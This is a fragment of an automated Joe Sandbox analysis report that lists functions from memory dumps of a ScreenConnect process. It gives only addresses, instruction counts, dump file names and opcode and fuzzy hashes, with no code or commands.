Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: ['
API String ID: 0-410297704
Opcode ID: f815751f743458db5f1fdad3dcfee5a5c95f07e146e6d074b420ec0141986fcc
Instruction ID: 787f1ecc63fbd3c979d821e608b3999c4e686784ef116af7603c9de0bdb0fa58
Opcode Fuzzy Hash: f815751f743458db5f1fdad3dcfee5a5c95f07e146e6d074b420ec0141986fcc
Instruction Fuzzy Hash: 7E31FE35B002029FC705EB6CA99596E7BE2EFC475030485ADD51ADB340EF78AE098BD0

Function 00FC7692 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f198a98fba0267966eb55153298bb6351893d4386539d4fc1dc7510482d56ef
Instruction ID: 8ea203eab5dc1c51489e812289f025fb13603dcf8ec96d65ec94e5ef542f2496
Opcode Fuzzy Hash: 0f198a98fba0267966eb55153298bb6351893d4386539d4fc1dc7510482d56ef
Instruction Fuzzy Hash: 0D61EE30D043498FDB06EFB8D854BD9BFB1EF86300F15819AD144AF2A2DB78A949CB51

Function 00FC5238 Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab8d104f305d34b41bf3c4a70736fffc87534b05708ee8e876cc7d7dd50482a9
Instruction ID: 1fc63e29333710f58789b84665c4f033c97df9d8ef932732f2557e21800c000f
Opcode Fuzzy Hash: ab8d104f305d34b41bf3c4a70736fffc87534b05708ee8e876cc7d7dd50482a9
Instruction Fuzzy Hash: 0C61F534B106058FCB14DFA9D894EAEB7F2FF89715B548168E506AB365DB30EC01EB80

Function 00FC6F40 Relevance: .2, Instructions: 178COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44d979395ebd731570f7e720396a0ffa4f8d9aa27df7daeced773074cb228f6f
Instruction ID: c7785d316d53b11db4fb20ca6bd6792aafc393c602e65f18ac6eeaef2723445b
Opcode Fuzzy Hash: 44d979395ebd731570f7e720396a0ffa4f8d9aa27df7daeced773074cb228f6f
Instruction Fuzzy Hash: 0F511430F042169FDB24AB64DA59B6EB7F2BF84310F14856DE446DB2A1DB309C45DB80

Function 00FC4940 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbccf23c0ac4506a309732a02b005431bc6180ef9f411f9d0c13bdcd8604726f
Instruction ID: 9d64967947618dfb585c27990f0f0e818e78d4a1d15430f8216ba34056c8eceb
Opcode Fuzzy Hash: fbccf23c0ac4506a309732a02b005431bc6180ef9f411f9d0c13bdcd8604726f
Instruction Fuzzy Hash: DE512734600A02CFC724CF29D994A66B7F2FF8D324B244A5CD49A9B7A0DB31F805DB44

Function 00FC7770 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ec4c52b8b762eacbc2483871634942e3c60fc2fafd26d1b7fb2af792ba092ed
Instruction ID: 3038c830a51aa2b2df19deac31de1c215336cb575c5850bfacce8b7f1c1a72cd
Opcode Fuzzy Hash: 3ec4c52b8b762eacbc2483871634942e3c60fc2fafd26d1b7fb2af792ba092ed
Instruction Fuzzy Hash: 24518C30E103099FDB05EFB8D844B9DBBB2FF88300F109569E108AB695EB74A995CB50

Function 00FC42F0 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: feef8ff512fb40de6234f32277e595c4e63d10d7e7299180abbdbb91811bda2c
Instruction ID: 467231f2d8636cc7975eebc63ec1c9f48b10b5ee1e5558edf58476f8c8b7a0c1
Opcode Fuzzy Hash: feef8ff512fb40de6234f32277e595c4e63d10d7e7299180abbdbb91811bda2c
Instruction Fuzzy Hash: 2641BF31A0010ACBCF19EF68E594BADBBA2EFC4314B14C569D905AF245CF34AC06DB91

Function 00FC3678 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38314e353171bd02734dbe9ff7473f9361c885caf6e9df7a8d8d37daf1e3c296
Instruction ID: 36c14dc5db30057a7ef025ace474117356e58440e597a9ba2b1c7d8469851df1
Opcode Fuzzy Hash: 38314e353171bd02734dbe9ff7473f9361c885caf6e9df7a8d8d37daf1e3c296
Instruction Fuzzy Hash: 9B412FB4A006068FCB64DF29D945B6ABBF1FF88350B108A2CD456DB6A0DB30E945DB90

Function 00FC366A Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b141bc0e117e6bec45b65e8120fd11810bca4657fb9c4ff5ea33aaeb51a8783
Instruction ID: 372ab1512c7f4a72c54016acfa9e4f9fabc8e3c89c0093ab4aeb11d9e24edf59
Opcode Fuzzy Hash: 2b141bc0e117e6bec45b65e8120fd11810bca4657fb9c4ff5ea33aaeb51a8783
Instruction Fuzzy Hash: 17414074A00706CFCB64DF29D945BAAB7F1FF44360B108A2CD456DB6A0DB30EA45DB90

Function 00FC3DC0 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95b106fa444e8efc2526fb00ab49cbe6e31f84a2c4516e0862fc77072b14ca6d
Instruction ID: e48ba5957f57665488d391f3281004f1b090cf049bfe64814421899554fcb92a
Opcode Fuzzy Hash: 95b106fa444e8efc2526fb00ab49cbe6e31f84a2c4516e0862fc77072b14ca6d
Instruction Fuzzy Hash: F1317A31B002068BCB149F69C959BAFFBF6EF89394F10846AD506E7350DB70DD089B91

Function 00FC381A Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8216eb22fc2920e157e7af83a212183fc2ce7771bbf18e15374ae103f8bbc3a8
Instruction ID: 57a01a15548c85b3b9f44aaaa0b7e6dc2e6dd82f92ffa3667a61fa5feb580208
Opcode Fuzzy Hash: 8216eb22fc2920e157e7af83a212183fc2ce7771bbf18e15374ae103f8bbc3a8
Instruction Fuzzy Hash: 5831F431F042468FC7159B68C855A6EFBB2EFC9350B1481BAD508DB391DB348D01C7A2

Function 00FC3828 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b645569593fef20f85da9bae5119ea7fc0b1d5209c4c76340c7c12fed4c5835
Instruction ID: d0af4ce0595018525905b1f656d382427af721a761691b8c56af2183f1e708e1
Opcode Fuzzy Hash: 7b645569593fef20f85da9bae5119ea7fc0b1d5209c4c76340c7c12fed4c5835
Instruction Fuzzy Hash: 1331E331F042468FCB15DB68D855A6EFBB7EFC9350B1481AAD508DB391DB309E01C7A1

Function 00FC5548 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 210dcfb80b9df09133dc1b4384cf6d02e113588b7c5bf062bb7705a9f1f1d001
Instruction ID: 4edbc20318f6f428d00469f6422ac1945aab76b55f9bdd6916ef27a076f1d567
Opcode Fuzzy Hash: 210dcfb80b9df09133dc1b4384cf6d02e113588b7c5bf062bb7705a9f1f1d001
Instruction Fuzzy Hash: 81314C30A00B068FC734CF29D985A6AB7F2EF89724B544A1CD496DB7A0D730F845EB91

Function 00FC4FD0 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 268996d793c4152307bbe5f6a30d3dd2adaa10a3af6e45222bdc14bbb2567e72
Instruction ID: e6cb36737fb648a3ad224f3a9bf22d826d0b60a0811e4f020ce4ad980e9ba20b
Opcode Fuzzy Hash: 268996d793c4152307bbe5f6a30d3dd2adaa10a3af6e45222bdc14bbb2567e72
Instruction Fuzzy Hash: 49317C36A0021ADFCF05DFA8D9409CDBBB2FF89305F11856AD5057B261DB31690ACF90

Function 00FC50C1 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2daecce383ea9f6bf16f2f2feb196362724b508c1b035a8c05a5a184912c562d
Instruction ID: 42ce5ec7592a68687735f81483eade0d05a66b7e1c326a27ba55711a1b06cf31
Opcode Fuzzy Hash: 2daecce383ea9f6bf16f2f2feb196362724b508c1b035a8c05a5a184912c562d
Instruction Fuzzy Hash: 24110635B002009BD705EB68E955B7EBBB2EFC5710F008969E505AB381DF786D09ABE1

Function 00FC4B70 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7503f6d31b9a1b8829d0ce6fa9a0bc165d5f0adef3ec0f0e049981ddd0d89d1e
Instruction ID: 2f2659bc273c8c85776e7da3a502095ea0c661b83ae03c97e072ba678159b531
Opcode Fuzzy Hash: 7503f6d31b9a1b8829d0ce6fa9a0bc165d5f0adef3ec0f0e049981ddd0d89d1e
Instruction Fuzzy Hash: D5212C316006068FC734CF25D959BA6BBF1EF84320B108A2DD492976A1DB71F94AEF90

Function 00FC50D0 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 177435edebf64c25a39f4cc11293546a9ffd1595a6a062fbe607c5934c938181
Instruction ID: 1722f6ecd573f85a60af28757c3a2bd325428f2bf1796994d607936dd32d4d8b
Opcode Fuzzy Hash: 177435edebf64c25a39f4cc11293546a9ffd1595a6a062fbe607c5934c938181
Instruction Fuzzy Hash: BF11C431B00205ABD704EB68ED55B7EBBB2EFC5710F408929E505AB381DF78AD099BD1

Function 00FC5197 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdb7c9e980a38aebe0c3be307e52a2d823fa10b7f4145a64a315dea9bacf2cf6
Instruction ID: 80de9704ea37f8390f26699eb09bd0bb32080189ab6e0204889d8bc50be12d04
Opcode Fuzzy Hash: fdb7c9e980a38aebe0c3be307e52a2d823fa10b7f4145a64a315dea9bacf2cf6
Instruction Fuzzy Hash: FC110431B042119FCB15DB68E88099EBBB5EFC5370308866AE948CB352EA749D45C790

Function 00FC4F41 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b19cadb9cc6563a19162f0171dba4460190d865e35ab577e0e5d7a582b71cbac
Instruction ID: 80dda68bc6a979c1155c505104972b37a7fefb519b8fcc931a2160725f953ea6
Opcode Fuzzy Hash: b19cadb9cc6563a19162f0171dba4460190d865e35ab577e0e5d7a582b71cbac
Instruction Fuzzy Hash: 08112E3290020A9FCF41DFA8C9419DEBBF1EF49314B5081A9D508BF261D7756E0ACB91

Function 00FC6E58 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 227e29290fcaabbfea7bb70d3a0edca26e265579f7bf2396126aa3b1fc949aef
Instruction ID: f032adc60f646d336df1b7335f05ffb14563379c0daedadd89b94138d11a321f
Opcode Fuzzy Hash: 227e29290fcaabbfea7bb70d3a0edca26e265579f7bf2396126aa3b1fc949aef
Instruction Fuzzy Hash: FA01F932F043265FCB059B68D805A57BBE9EFC4324710496FD409DB351DAB1AC018BD4

Function 00FC5649 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e39eaf9978108cc74a114beae37b4b288305b158c5d5de94336529e06fdd738
Instruction ID: 62103c984318672ade5d7347d9063e19f3629653ce5fff6015ee1226248c8d24
Opcode Fuzzy Hash: 5e39eaf9978108cc74a114beae37b4b288305b158c5d5de94336529e06fdd738
Instruction Fuzzy Hash: 4E110271E00305AFCB21CF68C941AEEBBB1AFC4720F5485AED584DB161E771AD42EB90

Function 00FC5658 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 254b47103e0f69f293b0d90487f8b9b57495de4bb156df2384e66d4edfbd4602
Instruction ID: c4207fcaf51699ec8ffea2015cb957b76ca12482db0feb336f728d9899d1d769
Opcode Fuzzy Hash: 254b47103e0f69f293b0d90487f8b9b57495de4bb156df2384e66d4edfbd4602
Instruction Fuzzy Hash: 4111E171F00206AFDB14CE69C901EAFBBB6AFC4B10F94C569D544D7250E7B1A941EB90

Function 00FC5035 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40b7f3658bb08315ba804dd7bd2c9a30378a12b36044769210ebe1d234a189e7
Instruction ID: 5f5c64b70c857a2907828c6bbe21afddc4b35fdbb4092f4eb08af74918141345
Opcode Fuzzy Hash: 40b7f3658bb08315ba804dd7bd2c9a30378a12b36044769210ebe1d234a189e7
Instruction Fuzzy Hash: F8115E3294004EDBCF01DFA8D644EDCBFB2FF80314B54C558D109AB116DB71A986EBA1

Function 00FC4F50 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7277888c6b6cfd655eb5e26dec9bc01374ee95c835272d5a9f260736e8c8bf8e
Instruction ID: 98357e46341d555a13461453a615a9f9d93610c18fbf13ad451e38a1050e0113
Opcode Fuzzy Hash: 7277888c6b6cfd655eb5e26dec9bc01374ee95c835272d5a9f260736e8c8bf8e
Instruction Fuzzy Hash: 9D111236A00109DFCF01DFA8D9409DEBBF5FF49314B508569E609BB261D771AA0ACF91

Function 00F6D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2381984406.0000000000F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f6d000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73f0995ef6df0f0b5ff7cca861e9cba4c92d335811e84be90e7920d64fa23e67
Instruction ID: 40c4cae4250eb0d2382927155a183ab0f07724c0eed51181a53775a2dc6b3b19
Opcode Fuzzy Hash: 73f0995ef6df0f0b5ff7cca861e9cba4c92d335811e84be90e7920d64fa23e67
Instruction Fuzzy Hash: 77012B72E04340FAE7104E25CDC0B67BF98DF85334F18C01AED094B18AC6B99841E7B1

Function 00F6D005 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2381984406.0000000000F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f6d000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3c293c8945d3c05dc8870cafb83748c195bceb06455a44faf097886ef1747ec
Instruction ID: f10142c2ab3d2d24e54cbb0907d8fe811d54f5b1598ea0fc00f8c23b91a35898
Opcode Fuzzy Hash: d3c293c8945d3c05dc8870cafb83748c195bceb06455a44faf097886ef1747ec
Instruction Fuzzy Hash: 87014C6190E3C09FE7128B258894B52BFB4EF53224F1981DBE9888F1A7C2695849C772

Function 00FC1828 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ced20b626b77ab5cdbc426f71c190ffbc7121c2f1be2cc79648026147c94331c
Instruction ID: 781443763e0600c63bcd6dba1060a7c4691d7e2a2c6cbdca8d82c6c763f7bf6f
Opcode Fuzzy Hash: ced20b626b77ab5cdbc426f71c190ffbc7121c2f1be2cc79648026147c94331c
Instruction Fuzzy Hash: 8101DF30A093458FC706AB74D919A143BB5FF8732431540EED5098B673CB34CC42DB52

Function 00FC8168 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a88002096d8812cb981e60edd614a15f1c580258ea90ac688e7d75dc601a237e
Instruction ID: 97e3c28ee1dc6fe3f50fd243135cc3ab8bddaeb096ff6cf5ff3f38f6e6b37676
Opcode Fuzzy Hash: a88002096d8812cb981e60edd614a15f1c580258ea90ac688e7d75dc601a237e
Instruction Fuzzy Hash: 05F08C37B0D2446FD728CABAA401A9BBBDECBD4220B14C07FE94DC3780E931A8018764

Function 00FC12A0 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c761797a54ecd8e9b1a165096a46c7ffba6562090cf7014c50f3920aaf644d8e
Instruction ID: 5f55fac730bda6c217d5e1bc48e0be91cb36db4c4e3d833349060a182c6c77e4
Opcode Fuzzy Hash: c761797a54ecd8e9b1a165096a46c7ffba6562090cf7014c50f3920aaf644d8e
Instruction Fuzzy Hash: CFF06D356003018FC746AB7CD645A993BF1EFC5724310856FD529CB615EB709C26AB91

Function 00FC1414 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67c418e7ef9d0a0f9e7837c3b57732797ebd7aeac8a04118011fce8b9fe889aa
Instruction ID: 66cbd844d6a4e668848900f0135399baf52afcacd7326bb76cdf6e37417be4c0
Opcode Fuzzy Hash: 67c418e7ef9d0a0f9e7837c3b57732797ebd7aeac8a04118011fce8b9fe889aa
Instruction Fuzzy Hash: FBF02B6310C3A28FD316D779E8122D87FA1EE9332474445CFD0818F593D698A906D756

Function 00FC8158 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2f301f97a3242d31af760e056945e6896dc2f1303df6a11b21879b80baf6ff1
Instruction ID: eecdd66b651a814b01d618d84796b2081400707acd4462314bbb21e5f3a2c717
Opcode Fuzzy Hash: f2f301f97a3242d31af760e056945e6896dc2f1303df6a11b21879b80baf6ff1
Instruction Fuzzy Hash: E2F0E576E0E3529FC355CB75E50269A7BE99F85220704C0BFE51CD7140E93488028B35

Function 00FC5F68 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4972476b816dd618e5f464b80cdbbdf7f410c12d03c558aa67fbc64650bc0db9
Instruction ID: efa1de5eb1061786c79c845a69505ae487abac9c25708cbe5355056071765f8c
Opcode Fuzzy Hash: 4972476b816dd618e5f464b80cdbbdf7f410c12d03c558aa67fbc64650bc0db9
Instruction Fuzzy Hash: 3BE02B32B05B435FC71555689D46A517BDA4A8A77433C85BDF054CB281F519EC81D381

Function 00FC12B0 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23c6c2ff5613075d22ccc667037650fcee89622fd1c6feb702acff4bd5dc73dd
Instruction ID: fc3169648ac26189864cfee61c0efb75ea304c97b0d931ba4d61fc5bd4579c65
Opcode Fuzzy Hash: 23c6c2ff5613075d22ccc667037650fcee89622fd1c6feb702acff4bd5dc73dd
Instruction Fuzzy Hash: DAF0E5353006059B8306E76DE900A9E3BE5DBC9760300802FE12DCB705DF71EC01ABD1

Function 00FC1DA1 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0dd5ceb8ef971331288ad48f0a8773c0bdf4a62fcb1f0ef1c7f7282d75de982
Instruction ID: ea5b2b6371ebf05bf3a7682f0b4c245ecda00b580b4e2bc1cedeba9b523817d5
Opcode Fuzzy Hash: b0dd5ceb8ef971331288ad48f0a8773c0bdf4a62fcb1f0ef1c7f7282d75de982
Instruction Fuzzy Hash: 1DE09B367003545FC3075778E81D0693BB6EFC5221315496BE51AC77A1DF784C52D7A1

Function 00FC6EF8 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c772a57ce3c49006eb22a75e46992b2ddf6b56f15d4b2525abf823c8e63c259e
Instruction ID: d09b87931c0d5954238a1445812f43b3f9e0d34536edd26d872058627178871a
Opcode Fuzzy Hash: c772a57ce3c49006eb22a75e46992b2ddf6b56f15d4b2525abf823c8e63c259e
Instruction Fuzzy Hash: 88E08631B443146787142AAE788C52EBEEAFBC86B5754843DF60EC3341DE758C1693A6

Function 00FC6EF2 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c2d039cfacf97369127b720c151817f8efe38c50f3c64b773bcc7145475c3a1
Instruction ID: 01580fa74d56d9886dca36b877edcf8e6a4ac2595ce40f92184effbbfe296566
Opcode Fuzzy Hash: 8c2d039cfacf97369127b720c151817f8efe38c50f3c64b773bcc7145475c3a1
Instruction Fuzzy Hash: 70E09231B003109B87041AA9648C2297AE6FFC8765310883DF50DD7351DE354C1797A1

Function 00FC5F78 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02b503b97a79ee1fcb066a4d66db8dfd97f8c7ac98160215dce09b6a17700aa6
Instruction ID: 9ee88a0500b38d2725aaaa323bbeea9f37bebe595bfae6bd68ef17414feab0a7
Opcode Fuzzy Hash: 02b503b97a79ee1fcb066a4d66db8dfd97f8c7ac98160215dce09b6a17700aa6
Instruction Fuzzy Hash: C3E04F22F018525B8B1891589A46B55B2C98B99BB473C857DF428CB285F625EC819280

Function 00FC181A Relevance: .0, Instructions: 24COMMON

Download Yara Rule

